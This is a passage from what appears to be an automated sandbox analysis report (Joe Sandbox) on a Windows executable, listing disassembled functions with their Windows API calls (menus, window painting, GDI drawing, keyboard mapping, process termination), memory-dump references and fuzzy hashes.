                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1101466143-0
                                                                                                                                                                  • Opcode ID: 335d342655c9b163f45605dcfc069ad3f392af6f4eb27548cccadb04133453fb
                                                                                                                                                                  • Instruction ID: e732852bdf182fb4f06d03ac75bbbbaa601d30b9942629ec7649e66e3ccb9b41
                                                                                                                                                                  • Opcode Fuzzy Hash: 335d342655c9b163f45605dcfc069ad3f392af6f4eb27548cccadb04133453fb
                                                                                                                                                                  • Instruction Fuzzy Hash: C4518BB5A10219EFDB14CF98D884AAAB7B8FF4C314B15855AE949DB300E731E951CFA0
                                                                                                                                                                  Function 002482DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetMenu.USER32(?), ref: 0024833D
                                                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00248374
                                                                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0024839C
                                                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 0024840B
                                                                                                                                                                  • GetSubMenu.USER32(?,?), ref: 00248419
                                                                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0024846A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 650687236-0
                                                                                                                                                                  • Opcode ID: 3dad2a1fdb8a58f98b1e2ad4709815a262fb3c9ebd5f770bdc696daeff239c6b
                                                                                                                                                                  • Instruction ID: 67bce3a263624d4c5fb784a02dba4c1cb22172daf349a0d6dc358b8c04d11129
                                                                                                                                                                  • Opcode Fuzzy Hash: 3dad2a1fdb8a58f98b1e2ad4709815a262fb3c9ebd5f770bdc696daeff239c6b
                                                                                                                                                                  • Instruction Fuzzy Hash: B151C031E2061AEFCF05DFA4D845AAEBBF4EF48710F108099E915BB351DB70AE518B90
                                                                                                                                                                  Function 002254E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 0022552E
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00225579
                                                                                                                                                                  • IsMenu.USER32(00000000), ref: 00225599
                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 002255CD
                                                                                                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 0022562B
                                                                                                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0022565C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3311875123-0
                                                                                                                                                                  • Opcode ID: c116e482b1af3f2cccd4c85b1bfdd5de25b8aa52f2691126e35f8e1f668681d7
                                                                                                                                                                  • Instruction ID: 54b874084a09f1228aec938206d893f97c20b327ae3fa91a34ebcbab73bc2d4f
                                                                                                                                                                  • Opcode Fuzzy Hash: c116e482b1af3f2cccd4c85b1bfdd5de25b8aa52f2691126e35f8e1f668681d7
                                                                                                                                                                  • Instruction Fuzzy Hash: A051B170A2067ABBDF10CFA8E888BBDBBF9EF05314F54C119E4159A291D3B09964CB51
                                                                                                                                                                  Function 001FB18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 001FB1C1
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 001FB225
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 001FB242
                                                                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001FB253
                                                                                                                                                                  • EndPaint.USER32(?,?), ref: 001FB29D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1827037458-0
                                                                                                                                                                  • Opcode ID: 43bea3544590d55d7a39714836f38669970d2749d49ee47b94b347ba1ff28928
                                                                                                                                                                  • Instruction ID: d204c7e793961b1d28ff5db75f3f11208b6c4f76639cf5784509e1da212a263c
                                                                                                                                                                  • Opcode Fuzzy Hash: 43bea3544590d55d7a39714836f38669970d2749d49ee47b94b347ba1ff28928
                                                                                                                                                                  • Instruction Fuzzy Hash: 0A41BC706083059FD710DF28ECC8BBA7BE8EF5A320F040669FA95862A1C774AC559B61
                                                                                                                                                                  Function 0024E1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ShowWindow.USER32(002A1810,00000000,?,?,002A1810,002A1810,?,0025E2D6), ref: 0024E21B
                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 0024E23F
                                                                                                                                                                  • ShowWindow.USER32(002A1810,00000000,?,?,002A1810,002A1810,?,0025E2D6), ref: 0024E29F
                                                                                                                                                                  • ShowWindow.USER32(?,00000004,?,?,002A1810,002A1810,?,0025E2D6), ref: 0024E2B1
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 0024E2D5
                                                                                                                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0024E2F8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 642888154-0
                                                                                                                                                                  • Opcode ID: 5fca9f96d4257661ca8bf5f85dd87a5513cfa2507d3e711aca3cdea710310421
                                                                                                                                                                  • Instruction ID: 7be48f3b63b54bd90578aca964f99c1e8ebe69d97271550c57e6bd8313f128df
                                                                                                                                                                  • Opcode Fuzzy Hash: 5fca9f96d4257661ca8bf5f85dd87a5513cfa2507d3e711aca3cdea710310421
                                                                                                                                                                  • Instruction Fuzzy Hash: 91419330610146EFEF2ACF14D499F947BE5BF06304F1981B9EE598F1A2C7B1A851CB51
                                                                                                                                                                  Function 0024E9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 001FB5EB
                                                                                                                                                                    • Part of subcall function 001FB58B: SelectObject.GDI32(?,00000000), ref: 001FB5FA
                                                                                                                                                                    • Part of subcall function 001FB58B: BeginPath.GDI32(?), ref: 001FB611
                                                                                                                                                                    • Part of subcall function 001FB58B: SelectObject.GDI32(?,00000000), ref: 001FB63B
                                                                                                                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0024E9F2
                                                                                                                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 0024EA06
                                                                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0024EA14
                                                                                                                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 0024EA24
                                                                                                                                                                  • EndPath.GDI32(00000000), ref: 0024EA34
                                                                                                                                                                  • StrokePath.GDI32(00000000), ref: 0024EA44
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 43455801-0
                                                                                                                                                                  • Opcode ID: bbb14de4896b5fd042904f07fc9056ce10182dfa2989f314fba72feb35cf83a2
                                                                                                                                                                  • Instruction ID: e820c395b7fbe172ef3515024102ae3ad0e5d05409cf362072dd35990cfe6b3d
                                                                                                                                                                  • Opcode Fuzzy Hash: bbb14de4896b5fd042904f07fc9056ce10182dfa2989f314fba72feb35cf83a2
                                                                                                                                                                  • Instruction Fuzzy Hash: A011F77650015DBFEF029F90EC88EAA7FADEB08360F048011FE0949160D7B19D659BA0
                                                                                                                                                                  Function 0021EF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0021EFB6
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0021EFC7
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0021EFCE
                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0021EFD6
                                                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0021EFED
                                                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0021EFFF
                                                                                                                                                                    • Part of subcall function 0021A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,0021A79D,00000000,00000000,?,0021AB73), ref: 0021B2CA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 603618608-0
                                                                                                                                                                  • Opcode ID: c759d7637fea6ce228bd59dd463bd17a79945d34577619fb01c001125a20547d
                                                                                                                                                                  • Instruction ID: d4dd87e7942d0f93bac8bf99e5208b5a83fcb90efbbd296e290db1af32e11685
                                                                                                                                                                  • Opcode Fuzzy Hash: c759d7637fea6ce228bd59dd463bd17a79945d34577619fb01c001125a20547d
                                                                                                                                                                  • Instruction Fuzzy Hash: 57017575E00209BBEB109BA59C49A5EBFB8EB48351F008065ED04A7290D6709C118B61
                                                                                                                                                                  Function 002087D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __init_pointers.LIBCMT ref: 002087D7
                                                                                                                                                                    • Part of subcall function 00201E5A: __initp_misc_winsig.LIBCMT ref: 00201E7E
                                                                                                                                                                    • Part of subcall function 00201E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00208BE1
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,FlsAlloc), ref: 00208BF5
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,FlsFree), ref: 00208C08
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,FlsGetValue), ref: 00208C1B
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,FlsSetValue), ref: 00208C2E
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00208C41
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,CreateSemaphoreExW), ref: 00208C54
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00208C67
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00208C7A
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,SetThreadpoolTimer), ref: 00208C8D
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00208CA0
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00208CB3
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,CreateThreadpoolWait), ref: 00208CC6
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,SetThreadpoolWait), ref: 00208CD9
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,CloseThreadpoolWait), ref: 00208CEC
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00208CFF
                                                                                                                                                                  • __mtinitlocks.LIBCMT ref: 002087DC
                                                                                                                                                                    • Part of subcall function 00208AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0029AC68,00000FA0,?,?,002087E1,00206AFA,002967D8,00000014), ref: 00208AD1
                                                                                                                                                                  • __mtterm.LIBCMT ref: 002087E5
                                                                                                                                                                    • Part of subcall function 0020884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 002089CF
                                                                                                                                                                    • Part of subcall function 0020884D: _free.LIBCMT ref: 002089D6
                                                                                                                                                                    • Part of subcall function 0020884D: RtlDeleteCriticalSection.NTDLL(0029AC68), ref: 002089F8
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 0020880A
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00208833
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3163737558-0
                                                                                                                                                                  • Opcode ID: d5a8b158fd8e4c542390c431add2271f547d6ecc681d62658a38737c7211a093
                                                                                                                                                                  • Instruction ID: accc4aa356c091ec1c46093c516bc86dfe219140bd3c8d3043d8d41f3dbb69d6
                                                                                                                                                                  • Opcode Fuzzy Hash: d5a8b158fd8e4c542390c431add2271f547d6ecc681d62658a38737c7211a093
                                                                                                                                                                  • Instruction Fuzzy Hash: 13F090336397125AE7247B78BC0B64B2AD49F01734B604A2AF4E4D50E3FF5088714995
                                                                                                                                                                  Function 0022A3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1423608774-0
                                                                                                                                                                  • Opcode ID: d4230b33133edb9d59494664fa26c27b5a74299fcc13084d017daf3c08ff1275
                                                                                                                                                                  • Instruction ID: 865f312a5fe9b7b5673562cdd05bcfe0641c8a5adffebeb635382b90096eb0f2
                                                                                                                                                                  • Opcode Fuzzy Hash: d4230b33133edb9d59494664fa26c27b5a74299fcc13084d017daf3c08ff1275
                                                                                                                                                                  • Instruction Fuzzy Hash: B7018132611222ABD7156F94FD5CDEB7769FF89702B004569F903925A1CBA0A810CB51
                                                                                                                                                                  Function 001E1867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001E1898
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 001E18A0
                                                                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001E18AB
                                                                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001E18B6
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 001E18BE
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 001E18C6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4278518827-0
                                                                                                                                                                  • Opcode ID: a785c22a6f92de47032cfd41fcce9b73d64a70e4f7c0309d9c72aab788aabe9f
                                                                                                                                                                  • Instruction ID: 679e2cbd38efbb37078d6196d99069df767423c8c15249abc5a72e1262a0ca14
                                                                                                                                                                  • Opcode Fuzzy Hash: a785c22a6f92de47032cfd41fcce9b73d64a70e4f7c0309d9c72aab788aabe9f
                                                                                                                                                                  • Instruction Fuzzy Hash: 0F0144B0A02B5ABDE3008F6A8C85A52FEA8FF19354F04411BE15C47A42C7F5A864CBE5
                                                                                                                                                                  Function 002284F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00228504
                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0022851A
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00228529
                                                                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00228538
                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00228542
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00228549
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
